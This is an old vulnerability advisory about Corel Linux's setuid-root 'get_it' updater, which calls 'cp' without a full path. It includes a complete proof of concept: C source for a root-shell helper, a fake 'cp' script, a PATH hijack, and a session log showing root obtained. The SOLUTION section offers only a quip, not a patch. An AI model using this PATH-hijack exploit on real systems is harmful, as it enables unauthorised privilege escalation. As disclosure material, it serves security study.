COMMAND

    update

SYSTEMS AFFECTED

    Corel Linux

PROBLEM

    Cesar Tascon Alvarez found following.  Corel Linux comes with a
    program called "Corel Update" to manage the ".deb" files.  This X
    oriented program is setuid root. The program is "get_it" and it's
    located in the /usr/X11R6/bin directory.

    If  you  can  run  it,  it's  easy  to get root privileges in your
    system.  It copies two files to the temp directory, taking no care
    to verify how.   In fact, it  calls the "cp"  program WITHOUT  THE
    WHOLE PATH!!

    The only thing you have to do to hack root, is to change your PATH
    to  execute  your  personal  copy  of  the program.  Let's see the
    example:

        Script started on Wed Jan 12 01:58:17 2000
        CorelLinux:~$ id
        uid=1001(tascon) gid=1001(tascon) groups=1001(tascon)
        CorelLinux:~$ cat misu.c
        #include <stdio.h>
        #include <unistd.h>
        
        main(argc,argv)
        int argc;
        char **argv;
        {
        if (argc==2);
        setuid(atoi(argv[1]));
        execlp("/bin/bash","/bin/bash",NULL);
        }
        CorelLinux:~$ cc -o misu misu.c
        CorelLinux:~$ pwd
        /home/tascon
        CorelLinux:~$ cat cp
        echo $1 $2 $3
        /home/tascon/misu 0
        CorelLinux:~$ export PATH=.:$PATH
        CorelLinux:~$ get_it
        /usr/X11R6/share/apps/get_it/html/largebanner.html /tmp/Get_It.0.a05872
        CorelLinux:~# id
        uid=0(root) gid=1001(tascon) groups=1001(tascon)
        CorelLinux:~# exit
        exit
        /usr/X11R6/share/apps/get_it/html/smallbanner.html /tmp/Get_It.1.a05872
        CorelLinux:~# id
        uid=0(root) gid=1001(tascon) groups=1001(tascon)

SOLUTION

    Easy to patch, isn't it?